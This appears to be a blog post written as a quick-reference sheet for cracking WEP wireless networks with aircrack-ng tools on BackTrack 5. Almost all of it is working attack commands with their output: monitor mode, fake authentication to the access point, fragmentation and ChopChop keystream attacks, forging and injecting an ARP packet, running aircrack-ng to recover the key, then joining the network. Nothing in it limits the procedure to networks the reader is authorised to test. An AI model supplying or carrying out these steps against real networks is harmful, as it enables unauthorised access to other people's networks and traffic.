This is nothing new and most of the attack detail comes from the excellent Hacking Exposed: Wireless Second Edition, I just wanted a quick reference sheet for the commands to crack a WEP network.
I’m using an ALFA AWUS036H connected to a Acer Aspire One D255 running BackTrack 5. The first thing I’ve found with this set up is that the rtl8187 kernel module seems to conflict with the iwlagn Intel wireless driver, so I just remove the Intel one while I’m using the ALFA.
# rmmod iwlagn
Then plug in the ALFA. You should see something like the following in /var/log/messages:
Nov 25 10:07:15 tiny kernel: [ 902.196162] usb 1-2: new high speed USB device number 5 using ehci_hcd
Nov 25 10:07:15 tiny kernel: [ 902.656669] ieee80211 phy3: hwaddr 00:c0:ca:40:ad:17, RTL8187vB (default) V1 + rtl
8225z2, rfkill mask 2
Nov 25 10:07:15 tiny kernel: [ 902.676112] rtl8187: Customer ID is 0xFF
Nov 25 10:07:15 tiny kernel: [ 902.677228] rtl8187: wireless switch is on
Nov 25 10:07:15 tiny kernel: [ 902.677402] usbcore: registered new interface driver rtl8187
Nov 25 10:07:15 tiny kernel: [ 902.726509] udev: renamed network interface wlan0 to wlan1
Run airmon-ng to check that everything is looking ok:
# airmon-ng
Interface Chipset Driver
wlan1 Realtek RTL8187L rtl8187 - [phy3]
wlan1 can be used with the aircrack tools, this is good. Start monitor mode:
# airmon-ng start wlan1
Now you can start capturing wireless traffic. You can use with kismet or airodump-ng. Kismet is an excellent tool with lots of useful features. I’m not much of a fan of the newcore UI to be honest but running the kismet server provides you with some excellent output files and has GPS integration too for location goodness.
When I’m doing an assessment though, I tend to break out airodump-ng. I just find its interface clearer and ultimately it plays nicely with the other aircrack tools that you’ll use to attack the networks.
# airodump-ng mon0
This on its own won’t record any output anywhere so its just to let you know what’s out there. So we identify a WEP network, as denoted by WEP in the ENC column:
[ CH 4 ][ Elapsed: 2 mins ][ 2011-11-25 11:12
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
de:ad:de:ad:be:ef -66 76 3 0 11 54e WEP WEP BTHomeHub2-1234
The formatting above sucks but we can see ESSID BTHomeHub2-1234 on Channel 11 is running WEP. We can also see there’s not much data on it. 4 packets. We’re either too far away (Power -67 is not great) or there’s no one using it. Proximity could be a problem but no one on it is not.
The first thing to note with a WEP network is that you can crack every single one. It’s not dependent on the “passphrase” used to protect it or anything like that. The way it uses RC4 is fundamentally broken and the attacks now are so efficient that you can break any key, usually in minutes, even on a laptop.
With WEP I tend not to both with any of the myriad of attacks available, I go straight for the jugular and crack the key. It’s never failed yet so why waste time with other attacks?
Attacking a WEP network with no clients
The basic idea is to “inject” traffic into the network in order to generate enough weak IVs to crack the WEP key.
- Start data capture
Start capturing data to a file:
# airodump-ng --channel 11 --bssid de:ad:de:ad:be:ef --write BTHomeHub2-1234 mon0
I choose to write the data to a file named after the ESSID.
- Fake auth
Now we need to perform a fake auth to the AP. Grab the MAC address of the mon0 interface:
# ifconfig mon0
mon0 Link encap:UNSPEC HWaddr 00-C0-CA-40-AD-17-00-00-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:26335 errors:0 dropped:3078 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5010971 (5.0 MB) TX bytes:0 (0.0 B)
Swap the hyphens for colons and use it in the following command:
# aireplay-ng --fakeauth 0 -o 1 -e BTHomeHub2-1234 -a de:ad:de:ad:be:ef -h 00:C0:CA:40:AD:17 mon0
You should get:
11:38:43 Waiting for beacon frame (BSSID: de:ad:de:ad:be:ef) on channel 11
11:38:43 Sending Authentication Request (Open System) [ACK]
11:38:43 Authentication successful
11:38:43 Sending Association Request [ACK]
11:38:43 Association successful :-) (AID: 1)
If the authentication is not successful there may be MAC filtering to get around. I’ll cover that another time maybe. In the airodump-ng screen you should your MAC address in the client list now.
- Launch fragmentation attack
We’ll try a fragmentation attack first, then a ChopChop attack if this is not successful.
# aireplay-ng --fragment -b de:ad:de:ad:be:ef -h 00:C0:CA:40:AD:17 mon0
11:46:22 Waiting for beacon frame (BSSID: de:ad:de:ad:be:ef) on channel 11
11:46:22 Waiting for a data packet...
Read 579 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = de:ad:de:ad:be:ef
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:24:17:16:85:0E
0x0000: 0862 0000 ffff ffff ffff dead dead beef .b.........$,fF.
0x0010: 0024 1716 850e e08e 4547 3f00 626c 8e77 .$......EG?.bl.w
0x0020: 6371 b3ee bc9c e6d0 c16d 0f29 54f0 5344 cq.......m.)T.SD
0x0030: 129f 00c9 c491 0ff7 92df 984a 8009 5859 ...........J..XY
0x0040: cc5a ecb0 .Z..
Use this packet ? y
Saving chosen packet in replay_src-1125-114651.cap
11:47:06 Data packet found!
11:47:06 Sending fragmented packet
11:47:06 Got RELAYED packet!!
11:47:06 Trying to get 384 bytes of a keystream
11:47:07 Got RELAYED packet!!
11:47:07 Trying to get 1500 bytes of a keystream
11:47:07 Got RELAYED packet!!
Saving keystream in fragment-1125-114707.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
If this is successful, you can skip straight to Step 5. If not, try a ChopChop attack.
- Launch a ChopChop attack
# aireplay-ng --chopchop -b de:ad:de:ad:be:ef -h 00:c0:ca:40:ad:17 mon0
11:50:10 Waiting for beacon frame (BSSID: de:ad:de:ad:be:ef) on channel 11
Read 51 packets...
Size: 76, FromDS: 1, ToDS: 0 (WEP)
BSSID = de:ad:de:ad:be:ef
Dest. MAC = 01:00:5E:00:00:01
Source MAC = 00:24:17:16:85:0E
0x0000: 0842 0000 0100 5e00 0001 dead dead beef .B....^....$,fF.
0x0010: 0024 1716 850e b00f a547 3f00 071f 4693 .$.......G?...F.
0x0020: 1750 ea4c 197d b353 0675 33b6 1ed6 619a .P.L.}.S.u3...a.
0x0030: 72a5 2fa6 4a27 47a9 d830 3699 7080 597c r./.J'G..06.p.Y|
0x0040: 4bfc f5e8 2ed0 b711 6d02 68b2 K.......m.h.
Use this packet ? y
Saving chosen packet in replay_src-1125-115012.cap
Offset 75 ( 0% done) | xor = 6B | pt = D9 | 296 frames written in 5040ms
Offset 74 ( 2% done) | xor = 32 | pt = 5A | 422 frames written in 7174ms
Offset 73 ( 4% done) | xor = 8D | pt = 8F | 141 frames written in 2399ms
Offset 72 ( 7% done) | xor = 3F | pt = 52 | 270 frames written in 4591ms
Offset 71 ( 9% done) | xor = 11 | pt = 00 | 275 frames written in 4674ms
Offset 70 (11% done) | xor = B7 | pt = 00 | 824 frames written in 14008ms
Offset 69 (14% done) | xor = AD | pt = 7D | 274 frames written in 4648ms
Offset 68 (16% done) | xor = 2C | pt = 02 | 272 frames written in 4634ms
Offset 67 (19% done) | xor = E8 | pt = 00 | 539 frames written in 9167ms
Offset 66 (21% done) | xor = F5 | pt = 00 | 138 frames written in 2332ms
Offset 65 (23% done) | xor = FC | pt = 00 | 272 frames written in 4633ms
Offset 64 (26% done) | xor = 4B | pt = 00 | 136 frames written in 2303ms
Offset 63 (28% done) | xor = 62 | pt = 1E | 137 frames written in 2335ms
Offset 62 (30% done) | xor = B5 | pt = EC | 271 frames written in 4613ms
Offset 61 (33% done) | xor = E4 | pt = 64 | 275 frames written in 4675ms
Offset 60 (35% done) | xor = 61 | pt = 11 | 273 frames written in 4637ms
Offset 59 (38% done) | xor = 99 | pt = 00 | 138 frames written in 2347ms
Offset 58 (40% done) | xor = 36 | pt = 00 | 137 frames written in 2329ms
Offset 57 (42% done) | xor = 34 | pt = 04 | 137 frames written in 2320ms
Offset 56 (45% done) | xor = 4C | pt = 94 | 137 frames written in 2345ms
Offset 55 (47% done) | xor = A8 | pt = 01 | 129 frames written in 2179ms
Offset 54 (50% done) | xor = 47 | pt = 00 | 136 frames written in 2318ms
Offset 53 (52% done) | xor = 27 | pt = 00 | 276 frames written in 4695ms
Offset 52 (54% done) | xor = AA | pt = E0 | 276 frames written in 4681ms
Offset 51 (57% done) | xor = 58 | pt = FE | 135 frames written in 2309ms
Offset 50 (59% done) | xor = 2E | pt = 01 | 137 frames written in 2329ms
Offset 49 (61% done) | xor = 0D | pt = A8 | 276 frames written in 4684ms
Offset 48 (64% done) | xor = B2 | pt = C0 | 137 frames written in 2323ms
Offset 47 (66% done) | xor = 63 | pt = F9 | 135 frames written in 2303ms
Offset 46 (69% done) | xor = 8C | pt = ED | 275 frames written in 4682ms
Offset 45 (71% done) | xor = D4 | pt = 02 | 138 frames written in 2338ms
Offset 44 (73% done) | xor = 1F | pt = 01 | 268 frames written in 4556ms
Offset 43 (76% done) | xor = B6 | pt = 00 | 276 frames written in 4694ms
Offset 42 (78% done) | xor = 73 | pt = 40 | 550 frames written in 9348ms
Offset 41 (80% done) | xor = 07 | pt = 72 | 275 frames written in 4674ms
Offset 40 (83% done) | xor = 55 | pt = 53 | 274 frames written in 4659ms
Sent 1940 packets, current guess: 8C...
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-1125-115040.cap
Saving keystream in replay_dec-1125-115040.xor
Completed in 25s (1.52 bytes/s)
- Craft an ARP packet
With either the fragmentation or ChopChop attack we now have the keystream recovered. We can use this to craft an ARP packet which will cause the AP to generate more traffic.
# packetforge-ng --arp -a de:ad:de:ad:be:ef -h 00:c0:ca:40:ad:17 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1125-114707.xor -w forged_arp
Now we have an ARP packet ready to inject in forged_arp.
- Inject the ARP packet
Now we replay the encrypted ARP packet into the target network.
# aireplay-ng –interactive -F -r ./forged_arp mon0
If you look at the airodump-ng output now, you should see the #Data column incrementing wildly. If not, something has gone wrong.
- Start aircrack-ng
Now we can start cracking using the airodump-ng output file:
# aircrack-ng ./BTHomeHub2-1234-01.cap -0
And wait for the magic words: KEY FOUND!
The key is NOT human-readable but it doesn’t need to be, you assign it straight to the wireless interface in Linux. Once my ALFA is up and running again, I can bring the built-in wireless card back online:
# modprobe iwlagn
Then set wlan0 accordingly:
# iwconfig wlan0 essid BTHomeHub2-1234 key XX:XX:XX:XX:XX:XX
where XX:XX:XX:XX:XX:XX is whatever was output by aircrack-ng. Shut down the interface and bring it back up and check you are associated:
# ifconfig wlan0 down
# ifconfig wlan0 up
# iwconfig wlan0
wlan0 IEEE 802.11bgn ESSID:”BTHomeHub2-1234?
Mode:Managed Frequency:2.462 GHz Access Point: de:ad:de:ad:be:ef
Bit Rate=1 Mb/s Tx-Power=14 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:XX:XX:XX:XX:XX:XX
Power Management:off
Link Quality=24/70 Signal level=-86 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:3 Missed beacon:0
